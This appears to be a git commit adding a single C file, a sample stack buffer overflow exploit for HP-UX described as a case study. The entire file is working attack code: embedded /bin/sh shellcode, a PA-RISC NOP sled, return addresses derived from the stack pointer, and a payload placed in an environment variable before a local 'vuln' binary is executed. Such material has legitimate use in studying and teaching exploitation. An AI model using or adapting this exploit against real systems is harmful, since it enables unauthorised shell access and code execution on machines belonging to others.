initial

1 files changed, 123 insertions, 0 deletions

diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
+/*
+ * Sample exploit for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <unistd.h>
+
+
+char shellcode[]=
+"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
+"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
+"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
+
+#define BUFFER_SIZE 180
+#define STACK_DSO -84
+#define NOP 0x0b390280
+#define PAD 0
+#define ALIGN 8
+#define ADB_PATH "/usr/bin/adb"
+#define VULNVAR "VULNBUF="
+#define MORE 1
+
+
+unsigned long get_sp(void)
+{
+   __asm__("copy %sp,%ret0 \n");
+}
+
+int main(int argc, char **argv) {
+int i, dso, align, padd, buf_size, adb, more;
+char *buf, *ptr;
+unsigned long retaddr;
+
+
+dso = STACK_DSO;
+align = ALIGN;
+padd = PAD;
+buf_size = BUFFER_SIZE;
+retaddr = 0;
+more = MORE;
+
+
+
+
+while ((i = getopt(argc, argv,
+                   "Dd:b:r:o:a:p:m:")) != EOF) {
+        switch (i) {
+        case 'd':
+        dso=(int) strtol(optarg, NULL, 0);
+        break;
+        case 'm':
+        more+=(int) strtol(optarg, NULL, 0);
+        break;
+        case 'b':
+        buf_size=(int)strtol(optarg, NULL, 0);
+        break;
+    case 'r':
+        retaddr = strtoul(optarg, NULL, 0);
+        break;
+        case 'a':
+            align = (int) strtol(optarg, NULL, 0);
+            break;
+        case 'p':
+            padd = (int) strtol(optarg, NULL, 0);
+            break;
+    case 'D':
+        adb = 1;  
+        break;
+        default:
+            fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
+            "[-r return_address]"
+                    "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
+            exit(1);
+            break;
+        }
+}
+
+
+buf=(char *)calloc(strlen(VULNVAR) + buf_size
+                   + sizeof(unsigned long)*more + 1, 1);
+ptr=buf;
+if (!buf) {
+    perror("calloc");
+    exit(1);
+}
+
+fprintf(stderr,"our stack %X\n",get_sp());
+if (!retaddr)
+    retaddr=get_sp()- dso + 3;
+fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
+                " buf_len: %i dso: %i more: %i\n",
+        retaddr, padd, align, buf_size, dso, more);
+
+strcpy(buf, VULNVAR);
+ptr+=strlen(VULNVAR);
+for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
+
+for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
+    *ptr++=(NOP>>24)&0xff;
+    *ptr++=(NOP>>16)&0xff;
+    *ptr++=(NOP>>8)&0xff;
+    *ptr++=(NOP)&0xff;
+}
+
+strcat(buf, shellcode); // append shellcode
+ptr+=strlen(shellcode);
+
+for(i=0;i<padd; i++) *ptr++='B'; // padd
+
+for (i=0;i<more ; i++) {
+    *ptr++=(retaddr>>24)&0xff;
+    *ptr++=(retaddr>>16)&0xff;
+    *ptr++=(retaddr>>8)&0xff;
+    *ptr++=(retaddr)&0xff;
+}
+fprintf(stderr,"buflen is %i\n", strlen(buf));
+putenv(buf,1);
+if (adb) 
+    execl(ADB_PATH,"adb","vuln", NULL);
+else     
+    execl("./vuln","vuln",buf, NULL);
+perror("execl");
+return 0; // uff
+}